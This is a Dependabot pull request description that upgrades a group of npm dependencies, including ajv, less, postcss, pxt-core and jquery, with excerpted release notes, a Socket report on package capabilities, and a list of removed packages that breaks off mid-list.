Bump the npm_and_yarn group across 1 directory with 11 updates

[dependabot]

Bumps the npm_and_yarn group with 7 updates in the / directory:

Package	From	To
ajv	4.11.8	6.12.6
request	2.83.0	2.88.2
less	2.7.3	4.2.0
postcss	5.2.18	8.4.38
pxt-core	0.18.6	8.3.1
rtlcss	2.2.0	4.1.1
autoprefixer	6.7.7	10.4.19

Updates ajv from 4.11.8 to 6.12.6

Release notes

Sourced from ajv's releases.

v6.12.6

Fix performance issue of "url" format.

v6.12.5

Fix uri scheme validation (@​ChALkeR). Fix boolean schemas with strictKeywords option (#1270)

v6.12.4

Fix: coercion of one-item arrays to scalar that should fail validation (failing example).

v6.12.3

Pass schema object to processCode function Option for strictNumbers (@​issacgerges, #1128) Fixed vulnerability related to untrusted schemas (CVE-2020-15366)

v6.12.2

Removed post-install script

v6.12.1

Docs and dependency updates

v6.12.0

Improved hostname validation (@​sambauers, #1143) Option keywords to add custom keywords (@​franciscomorais, #1137) Types fixes (@​boenrobot, @​MattiAstedrone) Docs:

• error logging example (@​RadiationSickness)
• TypeScript usage notes (@​thetric)

v6.11.0

Time formats support two digit and colon-less variants of timezone offset (#1061 , @​cjpillsbury) Docs: RegExp related security considerations Tests: Disabled failing typescript test

v6.10.2

Fix: the unknown keywords were ignored with the option strictKeywords: true (instead of failing compilation) in some sub-schemas (e.g. anyOf), when the sub-schema didn't have known keywords.

v6.10.1

Fix types Fix addSchema (#1001) Update dependencies

v6.10.0

Option strictDefaults to report ignored defaults (#957, @​not-an-aardvark) Option strictKeywords to report unknown keywords (#781)

v6.9.0

OpenAPI keyword nullable can be any boolean (and not only true). Custom keyword definition changes:

• dependencies option in to require the presence of keywords in the same schema.

... (truncated)

Commits

• fe59143 6.12.6
• d580d3e Merge pull request #1298 from ajv-validator/fix-url
• fd36389 fix: regular expression for "url" format
• 490e34c docs: link to v7-beta branch
• 9cd93a1 docs: note about v7 in readme
• 877d286 Merge pull request #1262 from b4h0-c4t/refactor-opt-object-type
• f1c8e45 6.12.5
• 764035e Merge branch 'ChALkeR-chalker/fix-comma'
• 3798160 Merge branch 'chalker/fix-comma' of git://github.com/ChALkeR/ajv into ChALkeR...
• a3c7eba Merge branch 'refactor-opt-object-type' of github.com:b4h0-c4t/ajv into refac...
• Additional commits viewable in compare view

Updates request from 2.83.0 to 2.88.2

Changelog

Sourced from request's changelog.

Change Log

v2.88.0 (2018/08/10)

• #2996 fix(uuid): import versioned uuid (@​kwonoj)
• #2994 Update to oauth-sign 0.9.0 (@​dlecocq)
• #2993 Fix header tests (@​simov)
• #2904 #515, #2894 Strip port suffix from Host header if the protocol is known. (#2904) (@​paambaati)
• #2791 Improve AWS SigV4 support. (#2791) (@​vikhyat)
• #2977 Update test certificates (@​simov)

v2.87.0 (2018/05/21)

• #2943 Replace hawk dependency with a local implemenation (#2943) (@​hueniverse)

v2.86.0 (2018/05/15)

• #2885 Remove redundant code (for Node.js 0.9.4 and below) and dependency (@​ChALkeR)
• #2942 Make Test GREEN Again! (@​simov)
• #2923 Alterations for failing CI tests (@​gareth-robinson)

v2.85.0 (2018/03/12)

• #2880 Revert "Update hawk to 7.0.7 (#2880)" (@​simov)

v2.84.0 (2018/03/12)

• #2793 Fixed calculation of oauth_body_hash, issue #2792 (@​dvishniakov)
• #2880 Update hawk to 7.0.7 (#2880) (@​kornel-kedzierski)

Commits

• See full diff in compare view

Updates less from 2.7.3 to 4.2.0

Release notes

Sourced from less's releases.

v4.2.0

• #3811 add support for container queries (@​puckowski)
• #3761 fix faulty source map generation with variables in selectors, fixes #3567 (@​pgoldberg)
• #3700 parsing variables fail when there is no trailing semicolon (@​b-kelly)
• #3719 modify this pointer so that it is not empty. (@​lumburr)
• #3649 fixes #2991 empty @media queries generated when compiling less file with (reference) to bootstrap (@​MoonCoral)

v4.1.3

• #3673 Feat: add support for case-insensitive attribute selectors (#3673) (@​iChenLei)
• #3710 Feat: add disablePluginRule flag for render() options (#3710) (@​broofa @​edhgoose)
• #3656 Fix #3655 for param tag is null (#3658) (@​langren1353)
• #3658 Fix #3646 forcefully change unsupported input to strings (#3658) (@​gzb1128)
• #3668 Fix change keyword plugin and import regexp (#3668) (@​iChenLei)
• #3613 Fix #3591: refactor debugInfo from class to function (#3613) (@​drdevlin)
• #3716 Fix https failures on macOS (#3716) (@​joeyparrish)

v4.1.2

• #3602 Fix currentFileInfo and index properties on nodes (#3602) (@​bjpbakker)
• #3626 Fix #3616 IfStatement requires double parentheses when dividing (#3626) (@​iChenLei)
• #3630 Fix needle dependency warning typo. (#3630) (@​cjwilsontech)

v4.1.1

• #3597 Fix expected response when there's a socket error (#3597) (@​zxfrank)
• #3589 Fixes #3586 (#3589) (@​matthew-dean)

v4.1.0

Mixin parentheses requirement removed

This was maybe too big a change without some kind of deprecation or conversion. So for this version, this works again:

.mixin;

• #3582 Fix #3576 import redirects. Replace native-request with needle. (#3582) (@​zaquest)
• #3583 Update rollup and other build dependencies (#3583) (@​pravi)
• #3588 Roll back paren requirement on mixin calls (#3588) (@​matthew-dean)

v4.0.0

This release has 2 breaking changes:

Parentheses required for mixin calls

This aligns it with syntax for calling detached rulesets.

Example

.mixin() {}
.mixin;  // error in 4.0

... (truncated)

Changelog

Sourced from less's changelog.

v4.2.0 (2023-08-06)

• #3811 add support for container queries (@​puckowski)
• #3761 fix faulty source map generation with variables in selectors, fixes #3567 (@​pgoldberg)
• #3700 parsing variables fail when there is no trailing semicolon (@​b-kelly)
• #3719 modify this pointer so that it is not empty. (@​lumburr)
• #3649 fixes #2991 empty @​media queries generated when compiling less file with (reference) to bootstrap (@​MoonCoral)

v4.1.3 (2022-06-09)

• #3673 Feat: add support for case-insensitive attribute selectors (#3673) (@​iChenLei)
• #3710 Feat: add disablePluginRule flag for render() options (#3710) (@​broofa @​edhgoose)
• #3656 Fix #3655 for param tag is null (#3658) (@​langren1353)
• #3658 Fix #3646 forcefully change unsupported input to strings (#3658) (@​gzb1128)
• #3668 Fix change keyword plugin and import regexp (#3668) (@​iChenLei)
• #3613 Fix #3591: refactor debugInfo from class to function (#3613) (@​drdevlin)
• #3716 Fix https failures on macOS (#3716) (@​joeyparrish)

v4.1.2 (2021-10-04)

• #3602 Fix currentFileInfo and index properties on nodes (#3602) (@​bjpbakker)
• #3626 Fix #3616 IfStatement requires double parentheses when dividing (#3626) (@​iChenLei)
• #3630 Fix needle dependency warning typo. (#3630) (@​cjwilsontech)

v4.1.1 (2021-01-31)

• #3597 Fix expected response when there's a socket error (#3597) (@​zxfrank)
• #3589 Fixes #3586 (#3589) (@​matthew-dean)

v4.1.0 (2021-01-10)

• #3582 Fix #3576 import redirects. Replace native-request with needle. (#3582) (@​zaquest)
• #3583 Update rollup and other build dependencies (#3583) (@​pravi)
• #3588 Roll back paren requirement on mixin calls (#3588) (@​matthew-dean)

v4.0.0 (2020-12-18)

• #3573 v4.0.0 (#3573) (@​matthew-dean)

v3.13.1 (2020-12-18)

• #3575 Fixes #3574 (#3575) (@​matthew-dean)

v3.13.0 (2020-12-12)

• #3572 Fixes #3434 - memory / runtime improvements (#3572) (@​matthew-dean)
• #3550 Examples contain more valid CSS, to test with a new parser (#3550) (@​matthew-dean)
• #3546 Bug fixes - fixes #3446 #3368 (#3546) (@​matthew-dean)

v3.12.2 (2020-07-16)

• #3545 Release 3.12.2 (#3545) (@​matthew-dean)

v3.12.1 (2020-07-16)

• #3544 Fixes #3533 (#3544) (@​matthew-dean)
• #3543 Fixes #3541 (#3543) (@​matthew-dean)

v3.12.0 (2020-07-13)

• #3540 v3.12.0-RC.2 (#3540) (@​matthew-dean)

... (truncated)

Commits

• 1b6dba1 [skip ci] add v4.2.0 changelog (#4215)
• 6390ae3 Release/v4.2.0 (#3814)
• 012d549 fix(issue:3766) add support for container queries (#3811)
• 8b5aef9 Create SECURITY.md
• 4d3189c Fixes #3787 -- ESLint updates and linting cleanup (#3790)
• a917965 ci: update the ci config (#3789)
• 2702322 fix faulty source map generation with variables in selectors (#3761)
• 9b37be7 [skip ci] update the issue template of bug report (#3785)
• 180d676 fix: make ci work (#3774)
• 0e99701 fix(parser): fix crash when css variable property does not end with a semicol...
• Additional commits viewable in compare view

Updates postcss from 5.2.18 to 8.4.38

Release notes

Sourced from postcss's releases.

8.4.38

• Fixed endIndex: 0 in errors and warnings (by @​romainmenke).

8.4.37

• Fixed original.column are not numbers error in another case.

8.4.36

• Fixed original.column are not numbers error on broken previous source map.

8.4.35

• Avoid ! in node.parent.nodes type.
• Allow to pass undefined to node adding method to simplify types.

8.4.34

• Fixed AtRule#nodes type (by @​tim-we).
• Cleaned up code (by @​DrKiraDmitry).

8.4.33

• Fixed NoWorkResult behavior difference with normal mode (by @​romainmenke).
• Fixed NoWorkResult usage conditions (by @​ahmdammarr).

8.4.32

• Fixed postcss().process() types (by @​ferreira-tb).

8.4.31

• Fixed \r parsing to fix CVE-2023-44270.

8.4.30

• Improved source map performance (by @​romainmenke).

8.4.29

• Fixed Node#source.offset (by @​idoros).
• Fixed docs (by @​coliff).

8.4.28

• Fixed Root.source.end for better source map (by @​romainmenke).
• Fixed Result.root types when process() has no parser.

8.4.27

• Fixed Container clone methods types.

8.4.26

• Fixed clone methods types.

8.4.25

• Improve stringify performance (by @​romainmenke).
• Fixed docs (by @​vikaskaliramna07).

8.4.24

• Fixed Plugin types.

... (truncated)

Changelog

Sourced from postcss's changelog.

8.4.38

• Fixed endIndex: 0 in errors and warnings (by @​romainmenke).

8.4.37

• Fixed original.column are not numbers error in another case.

8.4.36

• Fixed original.column are not numbers error on broken previous source map.

8.4.35

• Avoid ! in node.parent.nodes type.
• Allow to pass undefined to node adding method to simplify types.

8.4.34

• Fixed AtRule#nodes type (by Tim Weißenfels).
• Cleaned up code (by Dmitry Kirillov).

8.4.33

• Fixed NoWorkResult behavior difference with normal mode (by Romain Menke).
• Fixed NoWorkResult usage conditions (by @​ahmdammarr).

8.4.32

• Fixed postcss().process() types (by Andrew Ferreira).

8.4.31

• Fixed \r parsing to fix CVE-2023-44270.

8.4.30

• Improved source map performance (by Romain Menke).

8.4.29

• Fixed Node#source.offset (by Ido Rosenthal).
• Fixed docs (by Christian Oliff).

8.4.28

• Fixed Root.source.end for better source map (by Romain Menke).
• Fixed Result.root types when process() has no parser.

8.4.27

• Fixed Container clone methods types.

8.4.26

• Fixed clone methods types.

8.4.25

• Improve stringify performance (by Romain Menke).
• Fixed docs (by @​vikaskaliramna07).

8.4.24

• Fixed Plugin types.

... (truncated)

Commits

• See full diff in compare view

Updates pxt-core from 0.18.6 to 8.3.1

Commits

• 4169d90 8.3.1
• 4f6bd40 Bumping minor verstion to 8.3.0
• db9b0b2 8.2.17
• 78d9cdd Add multiplayer app, adjust package dependencies (#9051)
• 92e7048 8.2.16
• 0237301 Quick tutorial updates from testing (#9050)
• 8e30a88 8.2.15
• 4106dae Inline snippet click highlight (#9049)
• 8fb58ab Fix Image Editor Top Bar Button Sizing (#9054)
• 75404b1 Anzhou/localization blog (#9052)
• Additional commits viewable in compare view

Updates rtlcss from 2.2.0 to 4.1.1

Release notes

Sourced from rtlcss's releases.

Version 4.0

• Update dependencies, Internal code refactoring, cleanup and optimizations. Thanks @​XhmikosR
• Support flipping justify-content, justify-items and justify-self. Thanks @​mbehzad
• Support flipping length position without using calc.

Version 3.0

• Upgrade to POSTCSS 8.
• Dropped Node.js 6.x, 8.x, 11.x, and 13.x versions.

Changelog

Sourced from rtlcss's changelog.

4.1.1 - 18 Sep. 2023

• Update mirroring transform to safeguard functions inside values.
• Internal code refactoring. Thanks @​XhmikosR

4.1.0 - 11 Apr. 2023

• Update dependencies. Thanks @​XhmikosR
• Update mirroring transform-origin to not flip y-offset when x-offset is center. Thanks @​skmanohar
• Return an error code when the parssed CSS file is invalid. Thanks @​HANNICHE-Walid

4.0.0 - 09 Aug. 2022

• Update dependencies, Internal code refactoring, cleanup and optimizations. Thanks @​XhmikosR
• Support flipping justify-content, justify-items and justify-self. Thanks @​mbehzad
• Support flipping length position without using calc.

3.5.0 - 02 Nov. 2021

• Update dependencies. Thanks @​XhmikosR
• Internal code cleanup/formatting. Thanks @​XhmikosR

3.4.0 - 18 Oct. 2021

• Support flipping object-position.
• Update devDependencies.

3.3.0 - 08 Jul. 2021

• Add processEnv option to support flipping agent-defined environment variables (safe-area-inset-left, safe-area-inset-right).

3.2.1 - 22 Jun. 2021

• Bump glob-parent from 5.1.1 to 5.1.2.

3.2.0 - 23 May. 2021

• Add aliases option to support processing Custom Properties (CSS Variables). Thanks @​elchininet

3.1.2 - 04 Feb. 2021

• Update README.md.

3.1.1 - 02 Feb. 2021

• Fixes TypeError when placing value directive before !important. #218

3.1.0 - 30 Jan. 2021

• Use strict mode across all files. Thanks @​XhmikosR

... (truncated)

Commits

• d5aa111 4.1.1
• 34e6cee safeguard functions
• 3da99c9 Bump word-wrap from 1.2.3 to 1.2.4
• e050361 Use Object.values instead of Object.keys
• 94657cf Return early in more places
• f64dabc Update CI:
• 84f63e5 4.1.0
• 4b9be38 Update CI config
• 1aedcef Update CodeQL workflow
• e197c22 README.md: fix badge
• Additional commits viewable in compare view

Updates autoprefixer from 6.7.7 to 10.4.19

Release notes

Sourced from autoprefixer's releases.

10.4.19

• Removed end value has mixed support, consider using flex-end warning since end/start now have good support.

10.4.18

• Fixed removing -webkit-box-orient on -webkit-line-clamp (@​Goodwine).

10.4.17

• Fixed user-select: contain prefixes.

10.4.16

• Improved performance (by @​romainmenke).
• Fixed docs (by @​coliff).

10.4.15

• Fixed ::backdrop prefixes (by @​yisibl).
• Fixed docs (by @​coliff).

10.4.14

• Improved startup time and reduced JS bundle size (by @​Knagis).

10.4.13

• Fixed missed prefixes on vendor prefixes in name of CSS Custom Property.

10.4.12

• Fixed support of unit-less zero angle in backgrounds (by @​yisibl).

10.4.11

• Fixed text-decoration prefixes by moving to MDN data (by @​romainmenke).

10.4.10

• Fixed unicode-bidi prefixes by moving to MDN data.

10.4.9

• Fixed css-unicode-bidi issue from latest Can I Use.

10.4.8

• Do not print color-adjust warning if print-color-adjust also is in rule.

10.4.7

• Fixed print-color-adjust support in Firefox.

10.4.6

• Fixed print-color-adjust support.

10.4.5

• Fixed NaN in grid (by @​SukkaW).

10.4.4

• Fixed package.funding to have same value between all PostCSS packages.

... (truncated)

Changelog

Sourced from autoprefixer's changelog.

10.4.19

• Removed end value has mixed support, consider using flex-end warning since end/start now have good support.

10.4.18

• Fixed removing -webkit-box-orient on -webkit-line-clamp (@​Goodwine).

10.4.17

• Fixed user-select: contain prefixes.

10.4.16

• Improved performance (by Romain Menke).
• Fixed docs (by Christian Oliff).

10.4.15

• Fixed ::backdrop prefixes (by 一丝).
• Fixed docs (by Christian Oliff).

10.4.14

• Improved startup time and reduced JS bundle size (by Kārlis Gaņģis).

10.4.13

• Fixed missed prefixes on vendor prefixes in name of CSS Custom Property.

10.4.12

• Fixed support of unit-less zero angle in backgrounds (by 一丝).

10.4.11

• Fixed text-decoration prefixes by moving to MDN data (by Romain Menke).

10.4.10

• Fixed unicode-bidi prefixes by moving to MDN data.

10.4.9

• Fixed css-unicode-bidi issue from latest Can I Use.

10.4.8

• Do not print color-adjust warning if print-color-adjust also is in rule.

10.4.7

• Fixed print-color-adjust support in Firefox.

10.4.6

• Fixed print-color-adjust support.

10.4.5

• Fixed NaN in grid (by @​SukkaW).

10.4.4

• Fixed package.funding to have same value between all PostCSS packages.

... (truncated)

Commits

• 8060e33 Release 10.4.19 version
• fe7bae4 Remove end→flex-end warning
• 5f6f362 Update dependencies
• 13a86df Move to flat ESLint config
• b3e0579 Update dependencies
• 90dc18d Release 10.4.18 version
• 0af1be8 Update dependencies
• 1efe165 Update c8 config
• 80ff109 Add Node.js 21 to CI
• 5e5d193 Automate release creation
• Additional commits viewable in compare view

Updates jquery from 3.2.1 to 3.7.1

Release notes

Sourced from jquery's releases.

jQuery 3.7.1 Released: Reliable Table Row Dimensions

https://blog.jquery.com/2023/08/28/jquery-3-7-1-released-reliable-table-row-dimensions/

jQuery 3.7.0: Staying in Order

https://blog.jquery.com/2023/05/11/jquery-3-7-0-released-staying-in-order/

jQuery 3.6.4 Released: Selector Forgiveness

https://blog.jquery.com/2023/03/08/jquery-3-6-4-released-selector-forgiveness/

jQuery supports CSS.supports in jQuery 3.6.3

https://blog.jquery.com/2022/12/20/jquery-3-6-3-released-a-quick-selector-fix/

jQuery 3.6.2 :has arrived!

https://blog.jquery.com/2022/12/13/jquery-3-6-2-released/

jQuery 3.6.1 Maintenance Release

https://blog.jquery.com/2022/08/26/jquery-3-6-1-maintenance-release/

jQuery 3.6.0 Released!

https://blog.jquery.com/2021/03/02/jquery-3-6-0-released/

jQuery 3.5.0 Released!

See the blog post: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ and the upgrade guide: https://jquery.com/upgrade-guide/3.5/

NOTE: Despite being a minor release, this update includes a breaking change that we had to make to fix a security issue ( CVE-2020-11022). Please follow the blog post & the upgrade guide for more details.

Commits

• f79d5f1 3.7.1
• 399b201 Release: revert change that broke release
• f85d521 Release: update authors
• 763ade6 Build: Generate the slim build on grunt & run compare_size on it
• a288838 CSS: Make the reliableTrDimensions support test work with Bootstrap CSS (3.x ...
• 87467a6 Selector: Only attach the unload handler in IE & Edge Legacy
• 3c18c1f Build: Make sure *.cjs & *.mjs files use UNIX line endings as well
• 72ae577 Build: switch preferred email for timmywil
• a370d7d Build: Build: Bump actions/checkout from 3.5.2 to 3.5.3
• 4a29888 Docs: Fix typos found by codespell
• Additional commits viewable in compare view

Updates marked from 0.3.12 to 0.3.19

Commits

• 5d1baa4 Merge pull request #1157 from markedjs/release-0.3.19
• a089991 Merge pull request #64 from fidian/master
• ad6c7f9 Merge pull request #1156 from UziTech/docs-navigation
• 03e015c 0.3.19
• cf2def0 minify
• 29f4190 Ignore DS_Store on macos
• f29bceb Update publishing template (#1154)
• 210eed7 Update badge template (#1155)
• 9c01b83 link to README.md
• fd9f444 add github ribbon
• Additional commits viewable in compare view

Updates semver from 5.3.0 to 5.7.2

Release notes

Sourced from semver's releases.

v5.7.2

5.7.2 (2023-07-10)

Bug Fixes

• 2f8fd41 #585 better handling of whitespace (#585) (@​joaomoreno, @​lukekarrys)

Changelog

Sourced from semver's changelog.

5.7.2 (2023-07-10)

Bug Fixes

• 2f8fd41 #585 better handling of whitespace (#585) (@​joaomoreno, @​lukekarrys)

5.7

• Add minVersion method

5.6

• Move boolean loose param to an options object, with backwards-compatibility protection.
• Add ability to opt out of special prerelease version handling with the includePrerelease option flag.

5.5

• Add version coercion capabilities

5.4

• Add intersection checking

5.3

• Add minSatisfying method

5.2

• Add prerelease(v) that returns prerelease components

5.1

• Add Backus-Naur for ranges
• Remove excessively cute inspection methods

5.0

• Remove AMD/Browserified build artifacts
• Fix ltr and gtr when using the * range
• Fix for range * with a prerelease identifier

Commits

• f8cc313 chore: release 5.7.2
• 2f8fd41 fix: better handling of whitespace (#585)
• deb5ad5 chore: @​npmcli/template-oss@​4.16.0
• c83c18c 5.7.1
• 956e228 Correct typo in README
• 8055dda 5.7.0
• 604e73d auto-publishing scripts
• bed01e2 remove the nomin comments, since we don't minify any more anyway
• 9cb68f1 document parse method
• 38d42ca 5.7 changelog
• Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by lukekarrys, a new releaser for semver since your current version.

Updates websocket-extensions from 0.1.3 to 0.1.4

Changelog

Sourced from websocket-extensions's changelog.

0.1.4 / 2020-06-02

• Remove a ReDoS vulnerability in the header parser (CVE-2020-7662, reported by Robert McLaughlin)
• Change license from MIT to Apache 2.0

Commits

• 5ea0b42 Bump version to 0.1.4
• 29496f6 Remove ReDoS vulnerability in the Sec-WebSocket-Extensions header parser
• 4a76c75 Add Node versions 13 and 14 on Travis
• 44a677a Formatting change: {...} should have spaces inside the braces
• f6c50ab Let npm reformat package.json
• 2d211f3 Change markdown formatting of docs.
• 0b62083 Update Travis target versions.
• 729a465 Switch license to Apache 2.0.
• See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

---

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

• @dependabot rebase will rebase this PR
• @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
• @dependabot merge will merge this PR after your CI passes on it
• @dependabot squash and merge will squash and merge this PR after your CI passes on it
• @dependabot cancel merge will cancel a previously requested merge and block automerging
• @dependabot reopen will reopen this PR if it is closed
• @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
• @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
• @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
• @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
• @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
• @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
• @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
  You can disable automated security fix PRs for this repo from the Security Alerts page.

[socket-security]

New and removed dependencies detected. Learn more about Socket for GitHub ↗︎

Package	New capabilities	Transitives	Size	Publisher
npm/autoprefixer@10.4.19	environment	0	199 kB	ai
npm/browserslist@4.23.0	environment, filesystem	0	62.8 kB	ai
npm/caniuse-lite@1.0.30001607	None	0	2.04 MB	caniuse-lite
npm/codem-isoboxer@0.3.6	None	0	117 kB	tieleman
npm/copy-anything@2.0.6	None	0	11.9 kB	mesqueeb
npm/dashjs@4.4.0	None	0	36.6 MB	dsilhavy
npm/errno@0.1.8	None	0	18.1 kB	ralphtheninja
npm/es6-promise@4.2.8	None	0	315 kB	stefanpenner
npm/escalade@3.1.2	filesystem	0	11.6 kB	lukeed
npm/fast-deep-equal@2.0.1	None	0	5.42 kB	esp
npm/fraction.js@4.3.7	None	0	86.2 kB	infusion
npm/graceful-fs@4.2.11	environment, filesystem	0	32.5 kB	isaacs
npm/html-entities@1.4.0	None	0	68.6 kB	mdevils
npm/http-parser-js@0.5.8	None	0	25.8 kB	jimbly
npm/iconv-lite@0.6.3	None	0	349 kB	ashtuchkin
npm/imsc@1.1.5	None	+1	1.09 MB	palemieux
npm/is-what@3.14.1	None	0	62.3 kB	mesqueeb
npm/jquery@3.7.1	None	0	1.25 MB	timmywil
npm/less@4.2.0	eval, filesystem	+1	3.64 MB	matthew-dean
npm/lie@3.1.1	None	0	44.9 kB	cwmma
npm/localforage@1.10.0	network	0	468 kB	tofumatt
npm/make-dir@2.1.0	filesystem	+1	72.5 kB	sindresorhus
npm/marked@0.3.19	None	0	80.6 kB	amidknight
npm/mime@1.6.0	environment, filesystem	0	51.7 kB	broofa
npm/nanoid@3.3.7	None	0	24.4 kB	ai
npm/needle@3.3.1	environment, filesystem, network	0	324 kB	tomas
npm/node-releases@2.0.14	None	0	34 kB	chicoxyzzy
npm/parse-node-version@1.0.1	None	0	4.5 kB	phated
npm/picocolors@1.0.0	environment	0	5.66 kB	alexeyraspopov
npm/pify@4.0.1	None	0	7.23 kB	sindresorhus
npm/postcss-value-parser@4.2.0	None	0	27.2 kB	evilebottnawi
npm/postcss@8.4.38	environment, filesystem	0	198 kB	ai
npm/prr@1.0.1	None	0	10.1 kB	rvagg
npm/pxt-core@8.3.1	environment, filesystem, network, shell	0	59 MB	kindscript
npm/rtlcss@4.1.1	eval	0	51.8 kB	myounes
npm/safe-buffer@5.2.1	None	0	32.1 kB	feross
npm/safer-buffer@2.1.2	None	0	42.3 kB	chalker
npm/semantic-ui-less@2.2.14	None	0	3.82 MB	semantic-bot
npm/source-map-js@1.2.0	None	0	140 kB	7rulnik
npm/strip-json-comments@3.1.1	None	0	6.96 kB	sindresorhus
npm/tslib@2.6.2	None	0	84 kB	typescript-bot
npm/update-browserslist-db@1.0.13	filesystem, shell	0	13.9 kB	ai
npm/websocket-driver@0.7.4	network	0	67.4 kB	jcoglan
npm/websocket-extensions@0.1.4	None	0	55 kB	jcoglan

🚮 Removed packages: npm/ajv@5.5.2, npm/alphanum-sort@1.0.2, npm/ansi-regex@2.1.1, npm/ansi-styles@2.2.1, npm/aproba@1.2.0, npm/are-we-there-yet@1.1.4, npm/argparse@1.0.9, npm/asap@2.0.6, npm/asn1@0.2.3, npm/assert-plus@1.0.0, npm/asynckit@0.4.0, npm/autoprefixer@6.7.7, npm/aws-sign2@0.7.0, npm/aws4@1.6.0, npm/balanced-match@0.4.2, npm/bcrypt-pbkdf@1.0.1, npm/bindings@1.3.0, npm/bl@1.2.1, npm/bluebird@3.5.1, npm/boom@4.3.1, npm/brace-expansion@1.1.8, npm/browserslist@1.7.7, npm/caniuse-api@1.6.1, npm/caniuse-db@1.0.30000751, npm/caseless@0.12.0, npm/chalk@1.1.3, npm/chownr@1.0.1, npm/clap@1.2.3, npm/clone@1.0.3, npm/co@4.6.0, npm/coa@1.0.4, npm/code-point-at@1.1.0, npm/color-convert@1.9.0, npm/color-name@1.1.3, npm/color-string@0.3.0, npm/color@0.11.4, npm/colormin@1.1.2, npm/colors@1.1.2, npm/combined-stream@1.0.5, npm/commander@2.1.0, npm/concat-map@0.0.1, npm/console-control-strings@1.1.0, npm/core-util-is@1.0.2, npm/cryptiles@3.1.2, npm/css-color-names@0.0.4, npm/cssnano@3.10.0, npm/csso@2.3.2, npm/dashdash@1.14.1, npm/debug@2.6.9, npm/decamelize@1.2.0, npm/deep-extend@0.4.2, npm/define-properties@1.1.2, npm/defined@1.0.0, npm/delayed-stream@1.0.0, npm/delegates@1.0.0, npm/detect-libc@1.0.3, npm/ecc-jsbn@0.1.1, npm/electron-to-chromium@1.3.27, npm/end-of-stream@1.4.1, npm/errno@0.1.4, npm/escape-string-regexp@1.0.5, npm/esprima@2.7.3, npm/expand-template@1.1.0, npm/extend@3.0.1, npm/extsprintf@1.3.0, npm/fast-deep-equal@1.0.0, npm/fast-json-stable-stringify@2.0.0, npm/findup@0.1.5, npm/flatten@1.0.2, npm/foreach@2.0.5, npm/forever-agent@0.6.1, npm/form-data@2.3.1, npm/fs.realpath@1.0.0, npm/function-bind@1.1.1, npm/fuse.js@2.6.1, npm/gauge@2.7.4, npm/getpass@0.1.7, npm/github-from-package@0.0.0, npm/glob@7.1.2, npm/graceful-fs@4.1.11, npm/har-schema@2.0.0, npm/har-validator@5.0.3, npm/has-ansi@2.0.0, npm/has-flag@1.0.0, npm/has-symbols@1.0.0, npm/has-unicode@2.0.1, npm/has@1.0.1, npm/hawk@6.0.2, npm/highlight.js@9.12.0, npm/hoek@4.2.0, npm/html-comment-regex@1.1.1, npm/http-parser-js@0.4.10, npm/http-signature@1.2.0, npm/indexes-of@1.0.1, npm/inflight@1.0.6, npm/inherits@2.0.3, npm/ini@1.3.5, npm/is-absolute-url@2.1.0, npm/is-fullwidth-code-point@1.0.0, npm/is-plain-obj@1.1.0, npm/is-svg@2.1.0, npm/is-typedarray@1.0.0, npm/isarray@1.0.0, npm/isstream@0.1.2, npm/jquery@3.2.1, npm/js-base64@2.3.2, npm/js-yaml@3.7.0, npm/jsbn@0.1.1, npm/json-schema-traverse@0.3.1, npm/json-schema@0.2.3, npm/json-stable-stringify@1.0.1, npm/json-stringify-safe@5.0.1, npm/jsonify@0.0.0, npm/jsprim@1.4.1, npm/keytar@3.0.2, npm/less@2.7.3, npm/lie@3.2.0, npm/lodash.memoize@4.1.2, npm/lodash.uniq@4.5.0, npm/lzma@2.3.2, npm/macaddress@0.2.8, npm/marked@0.3.12, npm/math-expression-evaluator@1.2.17, npm/mime-db@1.30.0, npm/mime-types@2.1.17, npm/mime@1.4.1, npm/minimatch@3.0.4, npm/minimist@0.0.8, npm/mkdirp@0.5.1, npm/ms@2.0.0, npm/nan@2.3.2, npm/node-abi@2.2.0, npm/node-hid@0.5.7, npm/noop-logger@0.1.1, npm/normalize-url@1.9.1, npm/npmlog@4.1.2, npm/num2fraction@1.2.2, npm/number-is-nan@1.0.1, npm/oauth-sign@0.8.2, npm/object-assign@4.1.1, npm/object-keys@1.0.11, npm/object.assign@4.1.0, npm/once@1.4.0, npm/os-homedir@1.0.2, npm/path-is-absolute@1.0.1, npm/performance-now@2.1.0, npm/postcss-calc@5.3.1, npm/postcss-colormin@2.2.2, npm/postcss-convert-values@2.6.1, npm/postcss-discard-comments@2.0.4, npm/postcss-discard-duplicates@2.1.0, npm/postcss-discard-empty@2.1.0, npm/postcss-discard-overridden@0.1.1, npm/postcss-discard-unused@2.2.3, npm/postcss-filter-plugins@2.0.2, npm/postcss-merge-idents@2.1.7, npm/postcss-merge-longhand@2.0.2, npm/postcss-merge-rules@2.1.2, npm/postcss-message-helpers@2.0.0, npm/postcss-minify-font-values@1.0.5, npm/postcss-minify-gradients@1.0.5, npm/postcss-minify-params@1.2.2, npm/postcss-minify-selectors@2.1.1, npm/postcss-normalize-charset@1.1.1, npm/postcss-normalize-url@3.0.8, npm/postcss-ordered-values@2.2.3, npm/postcss-reduce-idents@2.4.0, npm/postcss-reduce-initial@1.0.1, npm/postcss-reduce-transforms@1.0.4, npm/postcss-selector-parser@2.2.3, npm/postcss-svgo@2.1.6, npm/postcss-unique-selectors@2.0.2, npm/postcss-value-parser@3.3.0, npm/postcss-zindex@2.2.0, npm/postcss@6.0.13, npm/prebuild-install@2.5.0, npm/prepend-http@1.0.4, npm/process-nextick-args@1.0.7, npm/promise@7.3.1, npm/prr@0.0.0, npm/pump@1.0.3, npm/punycode@1.4.1, npm/pxt-core@0.16.1, npm/q@1.5.1, npm/qs@6.5.1, npm/query-string@4.3.4, 